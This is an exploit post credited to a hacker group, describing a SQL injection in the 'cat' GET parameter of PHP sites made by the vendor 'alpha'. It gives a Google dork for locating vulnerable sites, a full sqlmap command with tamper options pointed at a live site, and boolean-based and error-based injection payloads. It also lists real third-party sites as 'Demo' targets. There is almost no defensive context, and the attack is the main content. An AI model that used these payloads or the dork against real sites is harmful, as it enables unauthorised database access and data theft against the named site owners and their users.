################################################################################# # Exploit Title: By Alpha Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"created by alpha" inurl:php?cat # Tested on : Kali Linux 2018.1 # Date : 12.03.2018 # Vendor Home: http://www.alpha.net.gr/data/home.php # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Sqlmap Or Manuel, Jsql, Themole, Sqlsus [+] Sql GET Parameter "cat" İs Vulnerable [+] The Back-End DBMS is MySQL >= 5.1 [+] 302 Redirect To N (no) Command:root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --hex --tamper=space2comment,between -u "http://www.thomasboats.gr/data/home.php?cat=950" --dbs Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=950' AND 2463=2463 AND 'EkSL' LIKE 'EkSL Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: cat=950' AND EXTRACTVALUE(7100,CONCAT(0x5c,0x717a6a7871,(SELECT (ELT(7100=7100,1))),0x717a626271)) AND 'YxZj' LIKE 'YxZj Demo Sql: http://www.thomasboats.gr/data/home.php?cat=950 http://salko.alpha.net.gr/data/home.php?cat=1083 Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR